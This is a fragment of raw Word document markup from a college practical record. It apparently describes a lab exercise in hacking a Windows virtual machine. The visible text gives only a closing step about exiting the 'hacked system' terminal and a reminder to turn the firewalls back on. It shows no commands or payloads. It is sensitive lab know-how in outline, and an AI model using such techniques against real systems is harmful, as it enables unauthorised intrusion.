      <w:r w:rsidRPr="00E72296" w:rsidR="00304CEC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D68" wp14:editId="1312A07D">
            <wp:extent cx="5731510" cy="32219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1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72296" w:rsidR="00DD0571" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D4C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00E72296" w:rsidR="00304CEC" w:rsidP="00534361" w:rsidRDefault="00DD0571" w14:paraId="4ADC8D4D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="22" w:right="125"/>
      </w:pPr>
      <w:r w:rsidRPr="00E72296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>Step 14:-</w:t>
      </w:r>
      <w:r w:rsidR="007868CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>For exiting from that hacked system type exit till the terminal close.(same for 2</w:t>
      </w:r>
      <w:r w:rsidRPr="007868CB" w:rsidR="007868CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="007868CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> window of the terminal)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E72296" w:rsidR="00304CEC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="mr-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADC8D6A" wp14:editId="70088CE8">
            <wp:extent cx="5731510" cy="270256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2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CEC" w:rsidP="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D4E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7868CB" w:rsidP="00304CEC" w:rsidRDefault="007868CB" w14:paraId="4ADC8D4F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7868CB" w:rsidP="00304CEC" w:rsidRDefault="007868CB" w14:paraId="4ADC8D50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Pr="00E72296" w:rsidR="007868CB" w:rsidP="00304CEC" w:rsidRDefault="007868CB" w14:paraId="4ADC8D51" w14:textId="28238DB8">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="10B0BED9" w:rsidR="007868CB"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  <w:t>Note:-</w:t>
      </w:r>
      <w:r w:rsidRPr="10B0BED9" w:rsidR="007868CB"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10B0BED9" w:rsidR="19593A31"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  <w:t>After</w:t>
      </w:r>
      <w:r w:rsidRPr="10B0BED9" w:rsidR="007868CB"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  <w:t xml:space="preserve"> performing practical turn on all the firewalls on the windows virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidRPr="00E72296" w:rsidR="007868CB">
      <w:headerReference w:type="default" r:id="rId20"/>
      <w:footerReference w:type="default" r:id="rId21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0507" w:rsidP="00304CEC" w:rsidRDefault="00E10507" w14:paraId="373F310E" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E10507" w:rsidP="00304CEC" w:rsidRDefault="00E10507" w14:paraId="3F3AAE6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277A6" w:rsidR="00304CEC" w:rsidP="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D71" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="003277A6">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>Mulund College of Commerce (Autonomous)2025-26</w:t>
    </w:r>
    <w:r w:rsidRPr="003277A6">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:ptab w:alignment="center" w:relativeTo="margin" w:leader="none"/>
    </w:r>
    <w:r w:rsidRPr="003277A6">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:ptab w:alignment="right" w:relativeTo="margin" w:leader="none"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D72" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00304CEC" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D7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0507" w:rsidP="00304CEC" w:rsidRDefault="00E10507" w14:paraId="07AB55F2" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E10507" w:rsidP="00304CEC" w:rsidRDefault="00E10507" w14:paraId="2CD0DD4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04CEC" w:rsidR="00304CEC" w:rsidP="22F39A28" w:rsidRDefault="00304CEC" w14:paraId="4ADC8D70" w14:textId="77777777">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="22F39A28" w:rsidR="22F39A28">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">Sakshi Mahesh Lanjekar</w:t>
    </w:r>
    <w:r w:rsidRPr="00304CEC">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:ptab w:alignment="center" w:relativeTo="margin" w:leader="none"/>
    </w:r>
    <w:r w:rsidRPr="00304CEC">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:ptab w:alignment="right" w:relativeTo="margin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A3FA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="331AD884"/>
    <w:lvl w:ilvl="0" w:tplc="34AE7684">
      <w:start w:val="5"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings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102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22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42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62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82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702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22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42" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="170363055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49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CEC"/>
    <w:rsid w:val="002D07F0"/>
    <w:rsid w:val="002D5907"/>
    <w:rsid w:val="00304CEC"/>
    <w:rsid w:val="003306F9"/>
    <w:rsid w:val="004D1984"/>
    <w:rsid w:val="00534361"/>
    <w:rsid w:val="005415DC"/>
    <w:rsid w:val="00542B5E"/>
    <w:rsid w:val="007868CB"/>
    <w:rsid w:val="008100E2"/>
    <w:rsid w:val="00AA1011"/>
    <w:rsid w:val="00BE6EAA"/>
    <w:rsid w:val="00D101E4"/>
    <w:rsid w:val="00DD0571"/>
    <w:rsid w:val="00DF347C"/>
    <w:rsid w:val="00E10507"/>
    <w:rsid w:val="00E43841"/>
    <w:rsid w:val="00E72296"/>
    <w:rsid w:val="00FD4DB4"/>
    <w:rsid w:val="10B0BED9"/>
    <w:rsid w:val="19593A31"/>
    <w:rsid w:val="22F39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C8CE9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1D99BDCB-E7BF-4DFA-9E55-2B9E10CF3C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bidi="mr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4CEC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304CEC"/>
    <w:rPr>
      <w:szCs w:val="20"/>
      <w:lang w:bidi="mr-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00304CEC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styleId="FooterChar" w:customStyle="1">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00304CEC"/>
    <w:rPr>
      <w:szCs w:val="20"/>
      <w:lang w:bidi="mr-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00304CEC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bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BodyTextChar" w:customStyle="1">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00304CEC"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34361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34361"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DD057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05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D0571"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-IN" w:bidi="mr-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="hljs-builtin" w:customStyle="1">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00DD05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9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1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81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settings" Target="settings.xml" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml" Id="rId21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header" Target="header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theme" Target="theme/theme1.xml" Id="rId23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fontTable" Target="fontTable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BHOOMIKA PANSARE</lastModifiedBy>
  <revision>14</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-10T14:49:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-04T11:28:56.2930722Z</dcterms:modified>
</coreProperties>
</file>